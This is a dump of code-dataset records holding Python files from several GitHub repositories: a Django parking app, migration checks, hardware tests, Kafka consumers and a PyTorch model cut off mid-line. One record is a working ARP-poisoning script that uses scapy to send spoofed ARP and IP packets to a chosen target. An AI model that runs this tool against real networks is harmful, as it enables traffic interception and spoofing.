"scipy.ndimage.measurements", "line_number": 196, "usage_type": "name"}, {"api_name": "scipy.ndimage.measurements.standard_deviation", "line_number": 197, "usage_type": "call"}, {"api_name": "scipy.ndimage.measurements", "line_number": 197, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 279, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 279, "usage_type": "name"}, {"api_name": "csv.writer", "line_number": 295, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 299, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 304, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 304, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 305, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 305, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 322, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 321, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 393, "usage_type": "call"}, {"api_name": "os.path", "line_number": 393, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 394, "usage_type": "call"}, {"api_name": "os.path", "line_number": 394, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 395, "usage_type": "call"}, {"api_name": "os.path", "line_number": 395, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 396, "usage_type": "call"}, {"api_name": "os.path", "line_number": 396, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 397, "usage_type": "call"}, {"api_name": "os.path", "line_number": 397, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 398, "usage_type": "call"}, {"api_name": "os.path", "line_number": 398, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 399, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 400, "usage_type": "call"}, {"api_name": "os.path", "line_number": 400, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 401, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 402, "usage_type": "call"}, {"api_name": "os.path", "line_number": 402, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 403, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 404, "usage_type": "call"}, {"api_name": "os.path", "line_number": 404, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 405, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 408, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 409, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 412, "usage_type": "call"}, {"api_name": "os.path", "line_number": 412, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 413, "usage_type": "call"}, {"api_name": "os.path", "line_number": 413, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 414, "usage_type": "call"}, {"api_name": "os.path", "line_number": 414, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 415, "usage_type": "call"}, {"api_name": "os.path", "line_number": 415, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 416, "usage_type": "call"}, {"api_name": "os.path", "line_number": 416, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 417, "usage_type": "call"}, {"api_name": "os.path", "line_number": 417, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 421, "usage_type": "call"}, {"api_name": "os.path", "line_number": 421, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 423, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 425, "usage_type": "call"}, {"api_name": "os.path", "line_number": 425, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 427, "usage_type": "call"}, {"api_name": "csv.QUOTE_NONE", "line_number": 427, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 431, "usage_type": "call"}]} +{"seq_id": "35554514079", "text": "#!/usr/bin/python3\n#EmreOvunc\n#info@emreovunc.com\n\nfrom argparse import ArgumentParser\nfrom scapy.all import *\nimport random\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('--target-ip', '-ti', help='target IP address')\n parser.add_argument('--target-mac', '-tm', help='target MAC address')\n parser.add_argument('--fake-ip', '-fi', help='fake IP address -spoofed-')\n parser.add_argument('--fake-mac', '-fm', help='fake MAC address -spoofed-')\n parser.add_argument('--count', '-c', help='number of packets')\n parser.add_argument('--version','-v', action='version', version='ARP_Poisoning_CMD v1.0.1')\n parser.epilog = \"Usage: python3 arp_poisoning_cmd.py -ti 10.20.30.40 -tm 11:22:33:aa:bb:cc -fi 10.20.30.41 -fm aa:bb:cc:11:22:33 -c 1\"\n\n args = parser.parse_args()\n\n if args.target_ip is not None:\n if args.target_mac is not None:\n if args.fake_ip is not None:\n if args.fake_mac is not None:\n ARP_Packet = ARP()\n ICMP_Packet = IP()\n\n DestinationIP(ARP_Packet, ICMP_Packet, args.target_ip)\n DestinationHW(ARP_Packet, args.target_mac)\n SourceIP(ARP_Packet, ICMP_Packet, args.fake_ip)\n SourceHW(ARP_Packet, args.fake_mac)\n\n if args.count is None:\n print('[!]You did not use --counter/-c parameter, so 1 packet will be sent..')\n send(ICMP_Packet)\n send(ARP_Packet)\n\n else:\n for pct in range(int(args.count)):\n send(ICMP_Packet)\n send(ARP_Packet)\n\n else:\n print('[-]Please, use --fake-mac or -fm to set a fake MAC address!')\n print('[!]Example: -fm aa:bb:cc:11:22:33')\n print('[?] -h for help')\n exit()\n else:\n print('[-]Please, use --fake-ip or -fi to set a fake IP address!')\n print('[!]Example: -fi 10.20.30.40')\n print('[?] -h for help')\n exit()\n else:\n print('[-]Please, use --target-mac or -tm to set a target MAC address!')\n print('[!]Example: -tm aa:bb:cc:11:22:33')\n print('[?] -h for help')\n exit()\n else:\n print('''usage: arp_poisoning_cmd.py [-h] [--target-ip TARGET_IP]\n [--target-mac TARGET_MAC] [--fake-ip FAKE_IP]\n [--fake-mac FAKE_MAC] [--count COUNT] [--version]\noptional arguments:\n -h, --help show this help message and exit\n --target-ip TARGET_IP, -ti TARGET_IP\n target IP address\n --target-mac TARGET_MAC, -tm TARGET_MAC\n target MAC address\n --fake-ip FAKE_IP, -fi FAKE_IP\n fake IP address -spoofed-\n --fake-mac FAKE_MAC, -fm FAKE_MAC\n fake MAC address -spoofed-\n --count COUNT, -c COUNT\n number of packets\n --version, -v show program's version number and exit\n\nUsage: python3 arp_poisoning_cmd.py -ti 10.20.30.40 -tm 11:22:33:aa:bb:cc -fi\n10.20.30.41 -fm aa:bb:cc:11:22:33 -c 1''')\n exit()\n\n\ndef SourceIP(ARP_Packet, ICMP_Packet, fakeip):\n ARP_Packet.psrc = fakeip\n ICMP_Packet.src = fakeip\n\n\ndef DestinationIP(ARP_Packet, ICMP_Packet, target):\n ARP_Packet.pdst = target\n ICMP_Packet.dst = target\n\n\ndef SourceHW(ARP_Packet, fakemac):\n ARP_Packet.hwsrc = fakemac\n\n\ndef DestinationHW(ARP_Packet, targetmac):\n ARP_Packet.hwdst = targetmac\n\n\ndef randomMAC():\n mac = [random.randint(0x00, 0xff), random.randint(0x00, 0xff), random.randint(0x00, 0xff),\n random.randint(0x00, 0x7f), random.randint(0x00, 0xff), random.randint(0x00, 0xff)]\n return ':'.join(map(lambda x: \"%02x\" % x, mac))\n\n\ndef randomIP():\n ip = \".\".join(map(str, (random.randint(0, 255) for _ in range(4))))\n return ip\n\nmain()\n", "repo_name": "EmreOvunc/ARP-Poisoning-Tool", "sub_path": "arp_poisoning_cmd.py", "file_name": "arp_poisoning_cmd.py", "file_ext": "py", "file_size_in_byte": 4045, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 39, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 100, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 101, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "14774976924", "text": "from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth import views as auth_views\nfrom django.views import generic\nfrom .forms import *\nfrom django.contrib.auth import login\nfrom django.contrib import messages\nfrom .models import *\nimport datetime\n# Create your views here.\n\nclass LoginView(auth_views.LoginView):\n template_name = 'user_login.html'\n\nclass UserSignUpView(generic.TemplateView):\n template_name = \"signup.html\"\n\n def get(self,request):\n form = UserRegistrationForm()\n return render(request, self.template_name, {\"form\":form})\n def post(self,request):\n form = UserRegistrationForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n return redirect(\"customer:home\")\n form = UserRegistrationForm\n return render(request, self.template_name, {\"form\": form})\n\n\nclass HomePageView(generic.TemplateView):\n template_name = \"home.html\"\n\n\n def post(self,request):\n if 'entry-btn' in request.POST:\n\n vehicle_number = request.POST.get('reg-num')\n data = CustomerData.objects.create(customer=self.request.user, vehicle_number=vehicle_number,entry_time=datetime.datetime.now())\n return render(request, 'code.html',{\"code\": data.code})\n else:\n code = request.POST.get('code')\n try:\n data = CustomerData.objects.get(code=code)\n data.exit_time = datetime.datetime.now()\n data.save()\n return render(request, 'user_data.html', {\"data\": data})\n except:\n error_msg = \"Invalid Code\"\n return render(request,self.template_name,{\"error\":error_msg})\n\n\nclass LogoutView(auth_views.LogoutView):\n template_name = 'user_login.html'\n", "repo_name": "anjanavalsaraj/parking_lot_management", "sub_path": "customer/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1860, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.auth.views.LoginView", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.views.generic.TemplateView", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 15, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 20, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 31, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.shortcuts.render", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 45, "usage_type": "attribute"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 50, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView", "line_number": 53, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.views", "line_number": 53, "usage_type": "name"}]} +{"seq_id": "32893638711", "text": "import re\nimport sys\n\nfrom django.core.management import call_command\nfrom django.core.management.base import BaseCommand, CommandError\n\n\nclass Command(BaseCommand):\n help = \"Automated test to make sure there are no non-null, dropping, renaming, or multiple migrations\"\n\n def handle(self, *args, **options):\n def run_and_check_migration(variable):\n try:\n results = re.findall(r\"([a-z]+)\\/migrations\\/([a-zA-Z_0-9]+)\\.py\", variable)[0]\n sql = call_command(\"sqlmigrate\", results[0], results[1])\n if (\n (\"NOT NULL\" in sql or \"DEFAULT\" in sql)\n and \"Create model\" not in sql\n and \"-- not-null-ignore\" not in sql\n ):\n print(\n f\"\\n\\n\\033[91mFound a non-null field added to an existing model. This will lock up the table while migrating. Please add 'null=True, blank=True' to the field\",\n )\n sys.exit(1)\n\n if \"RENAME\" in sql:\n print(\n f\"\\n\\n\\033[91mFound a rename command. This will lock up the table while migrating. Please create a new column and provide alternative method for swapping columns\",\n )\n sys.exit(1)\n\n if \"DROP COLUMN\" in sql:\n print(\n f\"\\n\\n\\033[91mFound a drop command. This could lead to unsafe states for the app. Please avoid dropping columns\",\n )\n sys.exit(1)\n except (IndexError, CommandError):\n pass\n\n migrations = sys.stdin.readlines()\n if len(migrations) > 1:\n print(\n f\"\\n\\n\\033[91mFound multiple migrations. Please scope PRs to one migration to promote easy debugging and revertability\",\n )\n sys.exit(1)\n\n for data in migrations:\n run_and_check_migration(data)\n", "repo_name": "lokeshpahal/posthog1", "sub_path": "posthog/management/commands/test_migrations_are_safe.py", "file_name": "test_migrations_are_safe.py", "file_ext": "py", "file_size_in_byte": 1998, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.core.management.base.BaseCommand", "line_number": 8, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 14, "usage_type": "call"}, {"api_name": "django.core.management.call_command", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 30, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 36, "usage_type": "call"}, {"api_name": "django.core.management.base.CommandError", "line_number": 37, "usage_type": "name"}, {"api_name": "sys.stdin.readlines", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 40, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "37034675822", "text": "import cocotb\nfrom cocotb.triggers import Timer\n\nfrom cocotblib.misc import randSignal, assertEquals, truncUInt, sint\n\n\nclass Ref:\n def __init__(self,dut):\n self.io_outSFix_0 = truncUInt(sint(dut.io_inSFix_0) + ((sint(dut.io_inSFix_1) << 2)), dut.io_outSFix_0)\n self.io_outSFix_1 = truncUInt((sint(dut.io_inSFix_0) * sint(dut.io_inSFix_1)) >> 5, dut.io_outSFix_1)\n self.io_outBundleA_a_sfix = truncUInt(sint(dut.io_inBundleA_a_sfix) >> 2, dut.io_outBundleA_a_sfix)\n sfix2 = sint(dut.io_inSFix2)\n self.io_outSFix2 = truncUInt(((sfix2 << 1) + sfix2) << 1, dut.io_outSFix2)\n\n@cocotb.test()\ndef test1(dut):\n dut.log.info(\"Cocotb test boot\")\n #random.seed(0)\n\n\n for i in range(0,1000):\n randSignal(dut.io_inSFix_0)\n randSignal(dut.io_inSFix_1)\n randSignal(dut.io_inBundleA_a_sfix)\n randSignal(dut.io_inSFix2)\n yield Timer(1000)\n ref = Ref(dut)\n assertEquals(ref.io_outSFix_0, dut.io_outSFix_0, \"io_outSFix_0\")\n assertEquals(ref.io_outSFix_1, dut.io_outSFix_1, \"io_outSFix_1\")\n assertEquals(ref.io_outSFix2, dut.io_outSFix2, \"io_outSFix2\")\n assertEquals(ref.io_outBundleA_a_sfix, dut.io_outBundleA_a_sfix, \"io_outBundleA_a_sfix\")\n\n dut.log.info(\"Cocotb test done\")\n", "repo_name": "SpinalHDL/SpinalHDL", "sub_path": "tester/src/test/python/spinal/FixedPointTester/FixedPointTester.py", "file_name": "FixedPointTester.py", "file_ext": "py", "file_size_in_byte": 1279, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 1406, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cocotblib.misc.truncUInt", "line_number": 9, "usage_type": "call"}, {"api_name": "cocotblib.misc.sint", "line_number": 9, "usage_type": "call"}, {"api_name": "cocotblib.misc.truncUInt", "line_number": 10, "usage_type": "call"}, {"api_name": "cocotblib.misc.sint", "line_number": 10, "usage_type": "call"}, {"api_name": "cocotblib.misc.truncUInt", "line_number": 11, "usage_type": "call"}, {"api_name": "cocotblib.misc.sint", "line_number": 11, "usage_type": "call"}, {"api_name": "cocotblib.misc.sint", "line_number": 12, "usage_type": "call"}, {"api_name": "cocotblib.misc.truncUInt", "line_number": 13, "usage_type": "call"}, {"api_name": "cocotblib.misc.randSignal", "line_number": 22, "usage_type": "call"}, {"api_name": "cocotblib.misc.randSignal", "line_number": 23, "usage_type": "call"}, {"api_name": "cocotblib.misc.randSignal", "line_number": 24, "usage_type": "call"}, {"api_name": "cocotblib.misc.randSignal", "line_number": 25, "usage_type": "call"}, {"api_name": "cocotb.triggers.Timer", "line_number": 26, "usage_type": "call"}, {"api_name": "cocotblib.misc.assertEquals", "line_number": 28, "usage_type": "call"}, {"api_name": "cocotblib.misc.assertEquals", "line_number": 29, "usage_type": "call"}, {"api_name": "cocotblib.misc.assertEquals", "line_number": 30, "usage_type": "call"}, {"api_name": "cocotblib.misc.assertEquals", "line_number": 31, "usage_type": "call"}, {"api_name": "cocotb.test", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "21162919840", "text": "from PyQt5.QtCore import pyqtSlot, Qt, QThread, pyqtSignal\nfrom PyQt5.QtWidgets import QWidget, QMessageBox\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtGui import QFont\n\nfrom ui.remove_gg import Ui_Form\nfrom ui.netwok import *\n\nfont_command = QFont()\nfont_command.setFamily(\"Arial\")\nfont_command.setPointSize(8)\n\nsernum = ''\nclass Remove_Ui(QWidget, Ui_Form):\n def __init__(self):\n super(Remove_Ui, self).__init__()\n self.setupUi(self)\n self.textEdit.setFont(font_command)\n\n self.textEdit.setDisabled(True)\n self.pushButton.clicked.connect(self.push_remove)\n\n @pyqtSlot()\n def push_remove(self):\n global sernum\n sernum = self.re_num_line.text()\n\n if not sernum:\n QMessageBox.about(self, '服务器编号不能为空', '服务器编号不能为空, 请输入服务器编号!')\n return\n\n run = Run_thr()\n self.textEdit.append('正在删除...')\n run.signal_ip.connect(self.removeip)\n run.start()\n run.exec()\n\n def removeip(self, status):\n if status == '1':\n QMessageBox.about(self, '机器编号输入错误', '后台查找不到此机器编号!')\n self.textEdit.append('机器编号输入错误!')\n return\n if status == '2':\n QMessageBox.about(self, '此服务器没有IP', '此服务器未分配IP!')\n self.textEdit.append('此服务器未分配IP!')\n return\n else:\n self.textEdit.append('删除完成!')\n\nclass Run_thr(QThread):\n signal_ip = pyqtSignal(str)\n def __init__(self):\n super(Run_thr, self).__init__()\n\n def run(self):\n self.signal_ip.emit(remove_ip(num=sernum))", "repo_name": "xuanJx/tools", "sub_path": "ui/remove_ui.py", "file_name": "remove_ui.py", "file_ext": "py", "file_size_in_byte": 1742, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtGui.QFont", "line_number": 9, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 14, "usage_type": "name"}, {"api_name": "ui.remove_gg.Ui_Form", "line_number": 14, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.about", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 29, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.about", "line_number": 40, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 40, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.about", "line_number": 44, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 44, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QThread", "line_number": 50, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "39488865124", "text": "# 猜数游戏\n# 猜数字 告诉大/小 猜错了给猜数字的钱 猜对了获胜 计算至少需要多少钱可以保证获胜(代价最小)\n\n# 首先二分查找查找次数最少 代价不是最少\n# 最小化极大问题 需要考虑最恶劣的情况 并且把开支最小化\nimport sys\nfrom typing import List\nclass Solution:\n def getMoneyAmount(self,n:int)->int:\n def cost(self, low:int, high:int)->int:\n if low > high:\n return 0\n res = sys.maxsize\n for i in range(low,high+1):\n tmp = i + max(cost(low,i-1),cost(i+1,high))\n res = min(res,tmp)\n return res\n return cost(1,n)\n # 记忆化递归 在取极大值时 我们需要判断i划分的两部分区域哪边继续寻找花销更大 如果我们从正中间分开\n # 显然右边更大\n def getMoneyAmount(self,n:int)->int:\n def cost(self,low:int,high:int,mem:List[List[int]])->int:\n if low > high:\n return 0\n if mem[low][high] != 0:\n return mem[low][high]\n res = sys.maxsize\n for i in range((low+high)//2,high+1):\n tmp = i + max(\n cost(low,i-1,mem),\n cost(i+1,high,mem),\n )\n # 尝试策略的最小\n res = min(res,tmp)\n mem[low][high] = res\n return res\n\n if n== 1:\n return 0\n mem = [[0]*(n+1) for _ in range(n+1)]\n\n return cost(1,n,mem)\n\n\n\n\n", "repo_name": "JudgesL/python-learning", "sub_path": "算法通关之路/第12章 博弈问题/猜数字大小.py", "file_name": "猜数字大小.py", "file_ext": "py", "file_size_in_byte": 1556, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.maxsize", "line_number": 13, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "sys.maxsize", "line_number": 27, "usage_type": "attribute"}]} +{"seq_id": "28415641530", "text": "from kafka import KafkaConsumer\nfrom multiprocessing import Process\nimport time\nimport json\n\n# Function that creates and runs a consumer\ndef run_consumer(consumer_id):\n consumer = KafkaConsumer(\n 'my-topic',\n group_id=None,\n auto_offset_reset='earliest',\n bootstrap_servers='localhost:9092',\n value_deserializer=lambda x: json.loads(x.decode('utf-8')) # Decode bytes to string and parse JSON\n )\n\n # Subscribe to the topic\n consumer.subscribe(['my-topic'])\n\n # Consume messages\n for message in consumer:\n current_time = time.time() # Get the current time in seconds\n message_time = message.value['timestamp'] # Get the message timestamp\n \n # Calculate the delta para latencia\n delta = current_time - message_time # Calculate the delta\n if delta < 30:\n with open(f'consumer_{consumer_id}_latency.txt', 'a') as f:\n f.write(f'{delta}\\n') # Write the message value and delta to the file\n\n # Close the consumer\n consumer.close()\n\n# Number of consumers\nnum_consumers = 30\n\n# Create and start consumers\nprocesses = []\nfor i in range(num_consumers):\n p = Process(target=run_consumer, args=(i,))\n p.start()\n processes.append(p)\n\ndef terminate_processes(processes):\n # Terminate all child processes\n for p in processes:\n p.terminate()\n p.join()\n# Wait for all consumers to finish\ntry:\n # Wait for all child processes to finish\n for p in processes:\n p.join()\nexcept KeyboardInterrupt:\n # Handle KeyboardInterrupt (Ctrl+C)\n print(\"KeyboardInterrupt detected. Terminating processes...\")\n terminate_processes(processes)", "repo_name": "mateogon/messaging-queue", "sub_path": "kafka/single_broker/k_consumer.py", "file_name": "k_consumer.py", "file_ext": "py", "file_size_in_byte": 1687, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "kafka.KafkaConsumer", "line_number": 8, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 13, "usage_type": "call"}, {"api_name": "time.time", "line_number": 21, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "31698420513", "text": "#!/usr/bin/env python3\nimport sys\nimport os\nimport glob\nfrom Bio.Blast import NCBIXML\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\n\n#Usage: python3 recruit_ORFs.py ORFs_db_example.ffn species_dir\n\ndef get_hit_ids(blast_file):\n blastfile_handle = open(blast_file)\n blast_records = NCBIXML.parse(blastfile_handle)\n hit_ids = list()\n for blast_record in blast_records:\n for alignment in blast_record.alignments: \n hit_name_full = alignment.title \n hit_name_split = hit_name_full.split() \n hit_id=hit_name_split[-1]\n hit_ids.append(hit_id)\n return(hit_ids)\n\n#Parse input arguments, set of working dirs\norf_db_file = sys.argv[1]\nspecies_dir = sys.argv[2]\ncurrent_dir = os.getcwd()\nfh_log_out = open('log.txt','a')\n\n#Move into SDP directory, use glob to get the names of all blast-files (exit script, if there are no such files)\nos.chdir(species_dir)\nblast_suffix = '*blastn'\nblast_files = glob.glob(blast_suffix)\nnb_blast_files = len(blast_files)\nif (nb_blast_files == 0):\n print('ERROR: No blast-files with the suffix \"*blastn\" were found in the species directory: \\n')\n fh_log_out.write('ERROR: No blast-files with the suffix \"*blastn\" were found in the species directory: \\n')\n fh_log_out.write(species_dir + \"\\n\")\n exit()\n\n#Loop over blast-files, and get the hit-ids for all hits. Store in dictionaries, with OG-affiliation. \nhit_id_OG = dict()\nOG_hit_id = dict()\ncount_progress = 0\nfor file in blast_files:\n count_progress += 1\n if (os.stat(file).st_size != 0): #check if file is empty\n split_filename = file.split('.')\n OG=split_filename[0]\n hit_ids = get_hit_ids(file)\n OG_hit_id[OG]=dict()\n for id in hit_ids:\n hit_id_OG[id]=OG\n OG_hit_id[OG][id]=1\n if (count_progress % 100 == 0):\n print('Finished parsing',count_progress,'blast-files')\n\n#Move back to run-directory, parse out seq-objects for all hit-ids\nos.chdir(current_dir)\nhit_seq_objects = dict()\nprint('Getting seq-records from ORF db')\nfor seq_record in SeqIO.parse(orf_db_file, \"fasta\"):\n if(seq_record.id in hit_id_OG):\n seq_length = len(seq_record.seq)\n if (seq_length > 200):\n hit_seq_objects[seq_record.id] = seq_record\n\n \n#Print ORF sequences to the SDP directory\nos.chdir(species_dir)\nprint('Printing recruited ORFs to files')\nnb_orfs_recruited=0\nfor OG in OG_hit_id.keys():\n ORF_seq_objects = list()\n for hit_id in OG_hit_id[OG].keys():\n if (hit_id in hit_seq_objects):\n ORF_seq_objects.append(hit_seq_objects[hit_id])\n nb_objects = len(ORF_seq_objects)\n if (nb_objects != 0):\n orf_outfile = OG + '_orfs.ffn'\n if (os.path.isfile(orf_outfile)):\n fh_log_out = open('log.txt','a')\n fh_log_out.write(\"NOTE: The following orf-file already exists: \" + orf_outfile + \"\\n\")\n fh_log_out.close()\n print('NOTE: The following orf-file already exists:', orf_outfile)\n else:\n nb_orfs_recruited += len(ORF_seq_objects)\n SeqIO.write(ORF_seq_objects, orf_outfile, \"fasta\")\nos.chdir(current_dir)\nfh_log_out = open('log.txt','a')\nfh_log_out.write(\"Recruited \" + str(nb_orfs_recruited) + \" ORFs to dir: \" + species_dir + \"\\n\")\nfh_log_out.close()\nprint(\"Recruited\",nb_orfs_recruited, \"ORFs to species\", species_dir)\n", "repo_name": "kirsten2/Species_validation", "sub_path": "bin/recruit_ORFs.py", "file_name": "recruit_ORFs.py", "file_ext": "py", "file_size_in_byte": 3402, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "Bio.Blast.NCBIXML.parse", "line_number": 13, "usage_type": "call"}, {"api_name": "Bio.Blast.NCBIXML", "line_number": 13, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 26, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 30, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 32, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 46, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 58, "usage_type": "call"}, {"api_name": "Bio.SeqIO.parse", "line_number": 61, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 61, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "Bio.SeqIO.write", "line_number": 87, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 87, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "3464454977", "text": "import sqlite3\nfrom classes.entity import Entity, EntityItem, Column\n\n\nclass SendChannel(EntityItem):\n def __init__(self, *args, **kwargs):\n self.SENDCHANNEL_ID = None\n self.SOURCE_CHANNEL = None\n self.TARGET_CHANNEL = None\n\n super().__init__(*args, **kwargs)\n\n\nclass SendChannels(Entity):\n def __init__(self, db: sqlite3.Connection):\n super().__init__(db,\n \"SendChannel\",\n [Column('SENDCHANNEL_ID', int, nullable=False, primary_key=True, auto_increment=True),\n Column('SOURCE_CHANNEL', int, nullable=False),\n Column('TARGET_CHANNEL', int)\n ],\n SendChannel\n )\n\n\n", "repo_name": "Cubiss/discord_bot", "sub_path": "modules/happyadventure/sendChannels.py", "file_name": "sendChannels.py", "file_ext": "py", "file_size_in_byte": 774, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "classes.entity.EntityItem", "line_number": 5, "usage_type": "name"}, {"api_name": "classes.entity.Entity", "line_number": 14, "usage_type": "name"}, {"api_name": "sqlite3.Connection", "line_number": 15, "usage_type": "attribute"}, {"api_name": "classes.entity.Column", "line_number": 18, "usage_type": "call"}, {"api_name": "classes.entity.Column", "line_number": 19, "usage_type": "call"}, {"api_name": "classes.entity.Column", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "70306258725", "text": "import torch\nimport torch.nn as nn\nfrom torchsummary import summary\n\nfrom common import *\n\n\nclass HumanPose_MBN(nn.Module):\n def __init__(self, c1=3, c2=14, alpha=0.5):\n super().__init__()\n\n first_block_filters = make_divisble(int(32*alpha), 8)\n self.conv0 = Conv(c1, first_block_filters, k=3, s=2)\n self.block0 = Mbnv2_block(first_block_filters, c2=16, stride=1, expansion=1, block_id=0)\n self.block1 = Mbnv2_block(make_divisble(int(16*alpha), 8), c2=16, stride=2, expansion=6, block_id=1)\n self.block2 = Mbnv2_block(make_divisble(int(16*alpha), 8), c2=16, stride=1, expansion=6, block_id=2)\n self.block3 = Mbnv2_block(make_divisble(int(16*alpha), 8), c2=32, 